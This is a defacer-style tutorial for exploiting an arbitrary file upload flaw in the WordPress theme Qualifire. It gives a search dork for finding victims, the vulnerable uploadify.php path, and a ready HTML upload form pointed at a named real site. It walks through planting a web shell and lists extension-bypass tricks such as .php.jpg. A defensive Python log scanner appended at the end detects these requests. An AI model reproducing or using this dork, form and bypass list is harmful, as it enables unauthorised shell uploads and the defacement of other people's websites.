WordPress Themes Qualifire - Arbitrary File Upload
inurl:"/wp-content/themes/qualifire" site:. (use your brain darling)
[+]Exploit : /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
[+]CSRF :
<title>CSRF Exploiter Wp-Qualifire</title>
<h1 style="background:black; color:green; padding:3px 5px;">CSRF Exploiter</h1>
<form
action="http://inwentech.pl/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>
OK, straight to the tutorial, follow along :v
1. First, dork using the dork above.
2. Then use the exploit path above, and pay attention to the path as well, for example:
www.site.com/[path]/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
==>
www.site.com/wordpress2/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
If the site is vulnerable the page is blank, but if it returns 404 it is not vulnerable.
3. Put the target site into the CSRF form, save it with the .html extension, then open it in a browser and upload your file or shell (most sites support .jpg & .txt, so be clever with your extension bypass). Then click Uploads.
4. If it succeeds it will look like this
5. What now? Access the file.
Access file > www.site.com/namefile.jpg
For a defacer.id mirror with a .jpg extension, you can read the trick from ShinChan N45HT.
Shell extension bypass, may succeed: .php.jpg .php.xxx.jpg .PhP.txt .php;_jpg .php.swf .pjpg
That's all '-'
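A defender-side check, added here as an example and not part of the original post: it scans web-server access logs for requests to the uploadify.php endpoint above and for served files whose names use the disguised extensions listed. The combined log format, the `scan` function, the finding labels and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Upload endpoint named in the post; a path prefix such as /wordpress2 may precede it.
UPLOADIFY = "/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
# PHP extension hidden before another suffix (.php.jpg, .PhP.txt, .php;_jpg), or .pjpg.
DISGUISED = re.compile(r"(?:\.php\d?[.;][^/]*|\.pjpg)$", re.IGNORECASE)
# Assumption: Apache/nginx "combined" access-log format.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def scan(lines):
    """Return (line_no, client_ip, finding, path) tuples for suspicious requests."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LINE.match(line)
        if not m:
            continue
        ip, method, target, status = m.groups()
        path = unquote(target.split("?", 1)[0])  # drop query string, decode %xx
        if path.lower().endswith(UPLOADIFY):
            if method == "POST" and status.startswith("2"):
                findings.append((n, ip, "upload-accepted", path))
            elif status != "404":
                # The post treats a blank (non-404) response as "vulnerable".
                findings.append((n, ip, "endpoint-exposed", path))
        elif DISGUISED.search(path) and status.startswith("2"):
            findings.append((n, ip, "disguised-file-served", path))
    return findings


# Constructed sample log lines (documentation IP ranges, made-up timestamps).
EP = "/wordpress2" + UPLOADIFY
TS = "[01/Jan/2020:10:00:0%d +0000]"
SAMPLE = [
    f'203.0.113.7 - - {TS % 1} "GET {EP} HTTP/1.1" 200 0 "-" "-"',
    f'203.0.113.7 - - {TS % 2} "POST {EP} HTTP/1.1" 200 1 "-" "-"',
    f'203.0.113.7 - - {TS % 3} "GET /namefile.php.jpg HTTP/1.1" 200 512 "-" "-"',
    f'198.51.100.4 - - {TS % 4} "GET /wp-login.php HTTP/1.1" 200 2301 "-" "-"',
    f'198.51.100.9 - - {TS % 5} "GET {UPLOADIFY} HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

An `upload-accepted` hit means the endpoint took a file, so the web root should be checked for it; deleting uploadify.php from the theme or denying web access to it closes the endpoint.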